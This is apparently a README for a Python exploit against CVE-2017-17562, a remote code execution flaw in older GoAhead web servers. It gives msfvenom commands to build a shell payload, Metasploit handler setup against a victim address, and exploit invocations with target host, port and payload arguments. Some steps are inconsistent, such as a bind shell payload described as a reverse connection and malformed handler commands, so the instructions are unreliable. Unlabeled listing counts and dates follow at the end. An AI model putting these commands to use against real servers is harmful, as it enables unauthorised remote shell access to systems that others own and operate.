GoAhead RCE Exploit
Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead (< v3.6.5) if the CGI is enabled and a CGI program is dynamically linked.
Usage
$ python3 cve-2017-17562-exploit.py [-h] --host HOST --port PORT --payload PAYLOAD [--ssl] [--cgi CGI]
Requirements
$ python3 -m pip install -r requirements.txt
Attention!
You need to generate the payload and set up the listening connection first.
Example:
(Attacker: 192.168.1.100 - Victim: 192.168.1.200)
$ msfvenom -a x64 --platform Linux -p generic/shell_bind_tcp LHOST=192.168.1.100 LPORT=1337 -f elf-so -o payload.so
$ msfconsole
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload generic/shell_bind_tcp
msf6 exploit(multi/handler) > set LPORT=1337
msf6 exploit(multi/handler) > set RHOST=192.168.1.200
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 192.168.1.200:1337
Then, in another shell, you must run this exploit to send the payload that will start the reverse connection to the listener!
Arguments
Required arguments:
--host HOST Host running the GoAhead webserver.
--port PORT Port running the GoAhead webserver. Default: 80
--payload PAYLOAD Path to the payload.
Optional arguments:
--ssl Host is using SSL.
--cgi LIST Paths list to discover the CGI script on the GoAhead server. Default: paths.lst
Example
$ python3 exploit.py --host 192.168.1.200 --port 8080 --cgi custom_list.txt --payload payload.so --ssl
11 Apr 02, 2022
4 Jan 17, 2022
1 Dec 28, 2021
25 Nov 09, 2022
15 Dec 01, 2022
6 Sep 01, 2022
0 Nov 06, 2021
362 Nov 28, 2022
15 Feb 21, 2022
5 May 18, 2022
81 Jan 08, 2023
2 Sep 12, 2022
11 Aug 27, 2022
1k Dec 09, 2022
6k Jan 09, 2023
555 Jan 02, 2023
3.5k Jan 09, 2023
9 Dec 27, 2022
823 Dec 21, 2022
39 Dec 16, 2022